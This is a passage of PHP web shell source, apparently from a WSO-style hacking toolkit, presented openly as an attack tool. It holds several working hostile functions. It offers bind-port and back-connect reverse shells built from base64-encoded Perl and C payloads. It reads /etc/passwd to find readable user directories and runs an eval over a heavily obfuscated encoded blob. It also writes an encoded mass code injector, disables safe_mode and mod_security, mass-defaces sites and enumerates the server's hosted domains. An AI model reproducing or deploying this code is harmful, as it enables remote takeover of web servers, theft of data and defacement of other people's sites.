3083 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
3084
3085 echo '<center><h1>Network tools</h1></center><div class=content>
3086 <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
3087 <br /><span>Bind port to /bin/sh</span><br/>
3088 Port: <input type=\'text\' name=\'port\' value=\'110\'> Password: <input type=\'text\' name=\'pass\' value=\'BHP\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
3089 </form>
3090 <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
3091 <br /><br /><span>Back-connect to</span><br/>
3092 Server: <input type=\'text\' name=\'server\' value="'.$_SERVER['REMOTE_ADDR'].'"> Port: <input type=\'text\' name=\'port\' value=\'110\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value=">>">
3093 </form><br>';
3094 if(isset($_POST['p1'])) {
3095 function cf($f,$t) {
3096 $w=@fopen($f,"w") or @function_exists('file_put_contents');
3097 if($w) {
3098 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
3099 @fclose($w);
3100 }
3101 }
3102 if($_POST['p1'] == 'bpc') {
3103 cf("/tmp/bp.c",$bind_port_c);
3104 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
3105 @unlink("/tmp/bp.c");
3106 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
3107 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
3108 }
3109 if($_POST['p1'] == 'bpp') {
3110 cf("/tmp/bp.pl",$bind_port_p);
3111 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
3112 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
3113 }
3114 if($_POST['p1'] == 'bcc') {
3115 cf("/tmp/bc.c",$back_connect_c);
3116 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
3117 @unlink("/tmp/bc.c");
3118 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
3119 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
3120 }
3121 if($_POST['p1'] == 'bcp') {
3122 cf("/tmp/bc.pl",$back_connect_p);
3123 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
3124 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
3125 }
3126 }
3127 echo '</div>';
3128 printFooter();
3129}
3130
3131
3132function actionReadable() {
3133 printHeader();
3134 echo '<h1>Readable Dirs</h1>';
3135 echo '<div class="content">';
3136 $sm = ini_get('safe_mode');
3137 if($sm) {
3138 echo '<br /><b>Error: safe_mode = on</b><br /><br />';
3139 } else {
3140 @$passwd = file('/etc/passwd','r');
3141 if (!$passwd) {
3142 echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';
3143 } else {
3144 $pub = array();
3145 $users = array();
3146 $conf = array();
3147 $i = 0;
3148 foreach($passwd as $p) {
3149 $r = explode(':',$p);
3150 $dirz = $r[5].'/public_html/';
3151 if(strpos($r[5],'home')) {
3152 array_push($users,$r[0]);
3153 if (is_readable($dirz)) {
3154 array_push($pub,$dirz);
3155 }
3156 }
3157 }
3158 echo '<br><br>';
3159 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
3160 echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /><br /><br />";
3161 foreach ($pub as $user) {
3162 echo $user."<br>";
3163 }
3164 echo "<br /><br /><br />[+] Complete...\n"."<br />";
3165 }
3166 }
3167 echo '</div>';
3168 printFooter();
3169}
3170
3171$the_buff = "\x3d\x3dQ\x2bk25jz2JkURpl\x63d4WQWxJfXQ4N0\x62o3/lNpnSPo8\x43JM33WtfdjpOTWfdk\x62v\x434L5Y/eFPD1n\x426v\x61\x42Df\x2bJ\x2bd\x63w10uIhyou\x62VL4DMPqXe7/Gf36pRyzSzNOW\x42vV\x42eI74\x43w\x425/PMost4wU9tsT\x6310QH9138YzgHUvvx\x421lwrS\x61o711UVJOi\x61\x42GSqipkuf3\x41jJZz\x62w\x63\x61ZR\x62Lz\x43YX\x62YT0/WNS\x62pgK3V\x61lhdqgxNk6Vkxt\x63th4NKTMO\x63yE\x2bQ8JLlFj6UF4NZRVw2\x62ODm5Oh90NFrLfxDSMW\x435\x433\x414RifJ0sxU\x419YwGufT\x61\x42gdpDXeIQ\x41Z\x61VXw\x2bM6t\x4296QSI\x62DT6Ffw\x63q4wNS\x414Z\x61K8O\x2be\x63y57H\x2bUIstRqJ9yvsvqRMv9S\x63mONNiSyM\x436MiePW6\x43ZRp2ehOtwQo31w/Xw3FS\x42M\x43vWUR2m/UHwK\x42wJe\x2bn\x63\x412Eg/EHwO\x42wJe\x2bn\x62\x41GFg/0GwS\x42wJe\x2bn\x61\x41WFg/kGwW\x42wJe";
3172eval(htmlspecialchars_decode(str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($the_buff)))))))))))));
3173
3174
3175
3176function actionInjector(){
3177 printHeader();
3178 $rev = "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";
3179 $handle = @fopen("rev.php", "w");
3180 @fwrite($handle, htmlspecialchars_decode(gzinflate(base64_decode($rev))));
3181 @fclose($handle);
3182 ?>
3183 <center><h1>Rev Mass Code Injector</h1><br><br>
3184 <iframe src="rev.php" width="100%" height="700"></iframe>
3185 </center>
3186 <?php
3187 printFooter();
3188 }
3189
3190function actionBypass() {
3191 printHeader();
3192 echo '<h1>Safe Mode</h1>';
3193 echo '<div class="content">';
3194 echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
3195 echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
3196 if(!empty($_POST['p2']) && isset($_POST['p2']))
3197 {
3198 $fil=fopen($GLOBALS['cwd'].".htaccess","w");
3199 fwrite($fil,'<IfModule mod_security.c>
3200 Sec------Engine Off
3201 Sec------ScanPOST Off
3202 </IfModule>');
3203 fclose($fil);
3204 }
3205 if(!empty($_POST['p1'])&& isset($_POST['p1']))
3206 {
3207 $fil=fopen($GLOBALS['cwd']."php.ini","w");
3208 fwrite($fil,'safe_mode=OFF
3209 disable_functions=NONE');
3210 fclose($fil);
3211 }
3212 if(!empty($_POST['p3']) && isset($_POST['p3']))
3213 {
3214 $fil=fopen($GLOBALS['cwd'].".htaccess","w");
3215 fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
3216 AddType application/x-httpd-cgi .sh
3217 AddHandler cgi-script .pl
3218 AddHandler cgi-script .pl');
3219 fclose($fil);
3220 }
3221 echo "<br><br /><br /></div>";
3222 echo '</div>';
3223 printFooter();
3224
3225}
3226
3227function actionDeface() {
3228printHeader();
3229echo "<center><h1>Mass Deface</h1><div class=content>";
3230?>
3231<center>
3232<form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">Folder: <br><input type=text name=path size=60 value="<?php echo getcwd(); ?>">
3233<br>File name: <br><input type=text name=file size=20 value="Pakistan_Zindabad.html"><br>Content:
3234<br> <textarea type=text name=Contents cols=70 rows=15 placeholder="Deface Page Here :)"></textarea>
3235<br><input type=submit value="Deface now"></p></form>
3236
3237<?php
3238if ($_POST['a'] == 'Deface') {
3239$mainpath = $_POST[p1];
3240$file = $_POST[p2];
3241$txtContents = $_POST[p3];
3242
3243$dir = opendir($mainpath); //fixme - cannot deface when change to writeable path!!
3244while ($row = readdir($dir)) {
3245$start = @fopen("$row/$file", "w+");
3246$code = $txtContents;
3247$finish = @fwrite($start, $code);
3248if ($finish) {
3249echo "http://$row/$file<br>";
3250}
3251}
3252
3253}
3254echo '</div>';
3255printFooter();
3256}
3257 function actionDomain() {
3258 printHeader();
3259echo '<h1>Local Domains</h1><div class=content>';
3260$file = @implode(@file("/etc/named.conf"));
3261$Domain_path = "/var/named";
3262if (!$file) {
3263$domains = scandir($Domain_path);
3264$count=1;
3265$dc = 0;
3266 echo "<table align=center border=1 width=59% cellpadding=5>
3267<tr><td colspan=2><center>There are : ( <b>" . count($domains) . "</b> ) Domains in this Sever.</center></td></tr>
3268<tr><td>No</td><td>Domains</td><td>User</td></tr>";
3269foreach ($domains as &$domain) {
3270 if (stripos($domain,".db")) {
3271 $domain = str_replace('.db','',$domain);
3272
3273 }
3274 if (strlen($domain) > 6) {
3275
3276 echo "<tr><td><a href='http://".$domain."' target='_blank'>".'http://'.$domain.'/index.php'."</a></td><td></td></tr>";
3277 }
3278}
3279 echo "</table>";
3280} else{
3281$count = 1;
3282preg_match_all("#named/(.*?).db#", $file, $r);
3283$domains = array_unique($r[1]);
3284echo "<table align=center border=1 width=59% cellpadding=5>
3285<tr><td colspan=2> There are ( <b>" . count($domains) . "</b> ) Domains in this Sever.I think you have got something this time yeah!!!.</td></tr>
3286<tr><td>Domains";
3287foreach ($domains as $domain) {
3288$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
3289echo "<tr><td><a href='http://".$domain."' target='_blank'>".'http://'.$domain.'/index.php'."</a></td><td></td></tr>";
3290 }
3291}
3292printFooter();
3293}
3294if( empty($_POST['a']) )
3295 if(isset($default_action) && function_exists('action' . $default_action))
3296 $_POST['a'] = $default_action;
3297 else
3298 $_POST['a'] = 'SecInfo';
3299if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
3300 call_user_func('action' . $_POST['a'])
3301?>